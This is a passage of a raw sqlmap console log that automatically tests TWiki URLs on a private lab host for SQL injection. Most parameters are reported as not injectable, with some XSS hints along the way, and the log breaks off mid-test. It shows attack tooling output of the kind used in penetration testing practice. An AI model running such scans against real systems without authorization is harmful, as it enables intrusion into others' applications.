[19:49:45] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 136:
GET http://192.168.1.113/twiki/bin/search/Main/SearchResult?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on
do you want to test this URL? [Y/n/q]
> Y
[19:49:45] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Main/SearchResult?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:49:45] [INFO] testing connection to the target URL
[19:49:46] [INFO] testing if the target URL is stable
[19:49:47] [INFO] target URL is stable
[19:49:47] [INFO] testing if URI parameter '#1*' is dynamic
[19:49:47] [INFO] confirming that URI parameter '#1*' is dynamic
[19:49:47] [INFO] URI parameter '#1*' is dynamic
[19:49:47] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:49:47] [INFO] testing for SQL injection on URI parameter '#1*'
[19:49:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:49:48] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:49:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:49:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:49:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:49:50] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:49:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:49:51] [INFO] testing 'MySQL inline queries'
[19:49:51] [INFO] testing 'PostgreSQL inline queries'
[19:49:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:49:51] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:49:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:49:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:49:52] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:49:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:49:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:49:54] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:49:54] [INFO] testing 'Oracle AND time-based blind'
[19:49:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:49:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:50:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:50:07] [WARNING] URI parameter '#1*' is not injectable
[19:50:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 137:
GET http://192.168.1.113:80/twiki/bin/edit/Main/WebChanges?t=1441457480
do you want to test this URL? [Y/n/q]
> Y
[19:50:07] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/WebChanges?t=1441457480'
[19:50:07] [INFO] testing connection to the target URL
[19:50:07] [INFO] testing if the target URL is stable
[19:50:08] [INFO] target URL is stable
[19:50:08] [INFO] testing if GET parameter 't' is dynamic
[19:50:08] [WARNING] GET parameter 't' does not appear dynamic
[19:50:08] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[19:50:08] [INFO] testing for SQL injection on GET parameter 't'
[19:50:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:50:09] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:50:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:50:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:50:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:50:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:50:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:50:11] [INFO] testing 'MySQL inline queries'
[19:50:11] [INFO] testing 'PostgreSQL inline queries'
[19:50:11] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:50:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:50:12] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:50:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:50:13] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:50:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:50:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:50:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:50:14] [INFO] testing 'Oracle AND time-based blind'
[19:50:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:50:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:50:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:50:26] [WARNING] GET parameter 't' is not injectable
[19:50:26] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 138:
GET http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&regex=on&search=Web *Changes[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[19:50:26] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&regex=on&search=Web *Changes[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:50:26] [INFO] testing connection to the target URL
[19:50:26] [INFO] testing if the target URL is stable
[19:50:27] [INFO] target URL is stable
[19:50:27] [INFO] testing if URI parameter '#1*' is dynamic
[19:50:27] [WARNING] URI parameter '#1*' does not appear dynamic
[19:50:27] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:50:27] [INFO] testing for SQL injection on URI parameter '#1*'
[19:50:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:50:28] [WARNING] reflective value(s) found and filtering out
[19:50:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:50:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:50:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:50:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:50:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:50:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:50:31] [INFO] testing 'MySQL inline queries'
[19:50:31] [INFO] testing 'PostgreSQL inline queries'
[19:50:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:50:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:50:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:50:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:50:32] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:50:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:50:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:50:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:50:34] [INFO] testing 'Oracle AND time-based blind'
[19:50:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:50:35] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:50:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:50:47] [WARNING] URI parameter '#1*' is not injectable
[19:50:47] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 139:
GET http://192.168.1.113:80/twiki/bin/view/Main/WebChanges?skin=print
do you want to test this URL? [Y/n/q]
> Y
[19:50:47] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebChanges?skin=print'
[19:50:47] [INFO] testing connection to the target URL
[19:50:48] [INFO] testing if the target URL is stable
[19:50:48] [INFO] target URL is stable
[19:50:48] [INFO] testing if GET parameter 'skin' is dynamic
[19:50:48] [INFO] confirming that GET parameter 'skin' is dynamic
[19:50:49] [INFO] GET parameter 'skin' is dynamic
[19:50:49] [INFO] heuristics detected web page charset 'ascii'
[19:50:49] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[19:50:49] [INFO] testing for SQL injection on GET parameter 'skin'
[19:50:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:50:49] [WARNING] reflective value(s) found and filtering out
[19:50:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:50:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:50:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:50:53] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:50:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:50:54] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:50:54] [INFO] testing 'MySQL inline queries'
[19:50:55] [INFO] testing 'PostgreSQL inline queries'
[19:50:55] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:50:55] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:50:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:50:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:50:57] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:50:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:50:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:50:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:51:00] [INFO] testing 'Oracle AND time-based blind'
[19:51:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:51:00] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:51:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:51:18] [WARNING] GET parameter 'skin' is not injectable
[19:51:18] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 140:
GET http://192.168.1.113:80/twiki/bin/rdiff/Main/WebChanges?rev1=1.3&rev2=1.2
do you want to test this URL? [Y/n/q]
> Y
[19:51:18] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebChanges?rev1=1.3&rev2=1.2'
[19:51:18] [INFO] testing connection to the target URL
[19:51:19] [INFO] testing if the target URL is stable
[19:51:20] [INFO] target URL is stable
[19:51:20] [INFO] testing if GET parameter 'rev1' is dynamic
[19:51:20] [WARNING] GET parameter 'rev1' does not appear dynamic
[19:51:20] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[19:51:20] [INFO] testing for SQL injection on GET parameter 'rev1'
[19:51:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:51:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:51:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:51:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:51:24] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:51:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:51:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:51:26] [INFO] testing 'MySQL inline queries'
[19:51:27] [INFO] testing 'PostgreSQL inline queries'
[19:51:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:51:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:51:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:51:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:51:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:51:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:51:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:51:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:51:33] [INFO] testing 'Oracle AND time-based blind'
[19:51:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:51:34] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:51:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:51:58] [WARNING] GET parameter 'rev1' is not injectable
[19:51:58] [INFO] testing if GET parameter 'rev2' is dynamic
[19:51:59] [WARNING] GET parameter 'rev2' does not appear dynamic
[19:51:59] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[19:51:59] [INFO] testing for SQL injection on GET parameter 'rev2'
[19:51:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:52:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:52:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:52:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:52:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:52:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:52:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:52:06] [INFO] testing 'MySQL inline queries'
[19:52:06] [INFO] testing 'PostgreSQL inline queries'
[19:52:07] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:52:07] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:52:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:52:08] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:52:09] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:52:10] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:52:11] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:52:12] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:52:13] [INFO] testing 'Oracle AND time-based blind'
[19:52:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:52:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:52:38] [WARNING] GET parameter 'rev2' is not injectable
[19:52:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 141:
GET http://192.168.1.113:80/twiki/bin/view/Main/WebChanges?rev=1.2
do you want to test this URL? [Y/n/q]
> Y
[19:52:38] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebChanges?rev=1.2'
[19:52:38] [INFO] testing connection to the target URL
[19:52:39] [INFO] testing if the target URL is stable
[19:52:40] [INFO] target URL is stable
[19:52:40] [INFO] testing if GET parameter 'rev' is dynamic
[19:52:40] [WARNING] GET parameter 'rev' does not appear dynamic
[19:52:40] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[19:52:40] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[19:52:40] [INFO] testing for SQL injection on GET parameter 'rev'
[19:52:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:52:40] [WARNING] reflective value(s) found and filtering out
[19:52:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:52:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:52:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:52:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:52:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:52:45] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:52:45] [INFO] testing 'MySQL inline queries'
[19:52:45] [INFO] testing 'PostgreSQL inline queries'
[19:52:45] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:52:45] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:52:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:52:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:52:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:52:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:52:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:52:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:52:49] [INFO] testing 'Oracle AND time-based blind'
[19:52:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:52:49] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:52:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:53:06] [WARNING] GET parameter 'rev' is not injectable
[19:53:06] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[19:53:06] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebChanges?rev1=1.2&rev2=1.1'
[19:53:06] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebChanges?rev=1.1'
URL 142:
GET http://192.168.1.113:80/twiki/bin/oops/Main/WebChanges?template=oopsmore&param1=1.3&param2=1.3
do you want to test this URL? [Y/n/q]
> Y
[19:53:06] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Main/WebChanges?template=oopsmore&param1=1.3&param2=1.3'
[19:53:06] [INFO] testing connection to the target URL
[19:53:06] [INFO] testing if the target URL is stable
[19:53:07] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[19:53:07] [INFO] testing if GET parameter 'template' is dynamic
[19:53:07] [INFO] confirming that GET parameter 'template' is dynamic
[19:53:07] [INFO] GET parameter 'template' is dynamic
[19:53:07] [INFO] heuristics detected web page charset 'ascii'
[19:53:07] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[19:53:07] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[19:53:07] [INFO] testing for SQL injection on GET parameter 'template'
[19:53:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:53:07] [WARNING] reflective value(s) found and filtering out
[19:53:08] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:53:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:53:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:53:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:53:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:53:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:53:10] [INFO] testing 'MySQL inline queries'
[19:53:10] [INFO] testing 'PostgreSQL inline queries'
[19:53:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:53:10] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:53:11] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:53:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:53:11] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:53:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:53:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:53:13] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:53:13] [INFO] testing 'Oracle AND time-based blind'
[19:53:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:53:13] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:53:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:53:22] [WARNING] GET parameter 'template' is not injectable
[19:53:22] [INFO] testing if GET parameter 'param1' is dynamic
[19:53:22] [WARNING] GET parameter 'param1' does not appear dynamic
[19:53:23] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[19:53:23] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[19:53:23] [INFO] testing for SQL injection on GET parameter 'param1'
[19:53:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:53:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:53:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:53:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:53:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:53:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:53:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:53:26] [INFO] testing 'MySQL inline queries'
[19:53:26] [INFO] testing 'PostgreSQL inline queries'
[19:53:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:53:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:53:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:53:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:53:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:53:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:53:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:53:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:53:30] [INFO] testing 'Oracle AND time-based blind'
[19:53:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:53:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:53:43] [WARNING] GET parameter 'param1' is not injectable
[19:53:43] [INFO] testing if GET parameter 'param2' is dynamic
[19:53:43] [WARNING] GET parameter 'param2' does not appear dynamic
[19:53:43] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[19:53:43] [INFO] testing for SQL injection on GET parameter 'param2'
[19:53:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:53:44] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:53:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:53:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:53:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:53:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:53:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:53:47] [INFO] testing 'MySQL inline queries'
[19:53:47] [INFO] testing 'PostgreSQL inline queries'
[19:53:47] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:53:47] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:53:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:53:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:53:48] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:53:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:53:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:53:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:53:50] [INFO] testing 'Oracle AND time-based blind'
[19:53:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:53:54] [INFO] target URL appears to be UNION injectable with 10 columns
[19:53:54] [WARNING] applying generic concatenation with double pipes ('||')
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[19:53:58] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[19:54:01] [INFO] testing 'MySQL UNION query (58) - 1 to 10 columns'
[19:54:07] [WARNING] GET parameter 'param2' is not injectable
[19:54:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 143:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/StartingPoints?t=1441457517
do you want to test this URL? [Y/n/q]
> Y
[19:54:07] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/StartingPoints?t=1441457517'
[19:54:07] [INFO] testing connection to the target URL
[19:54:07] [INFO] testing if the target URL is stable
[19:54:08] [INFO] target URL is stable
[19:54:08] [INFO] testing if GET parameter 't' is dynamic
[19:54:08] [WARNING] GET parameter 't' does not appear dynamic
[19:54:08] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[19:54:08] [INFO] testing for SQL injection on GET parameter 't'
[19:54:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:54:09] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:54:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:54:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:54:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:54:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:54:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:54:12] [INFO] testing 'MySQL inline queries'
[19:54:12] [INFO] testing 'PostgreSQL inline queries'
[19:54:12] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:54:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:54:12] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:54:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:54:13] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:54:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:54:14] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:54:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:54:15] [INFO] testing 'Oracle AND time-based blind'
[19:54:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
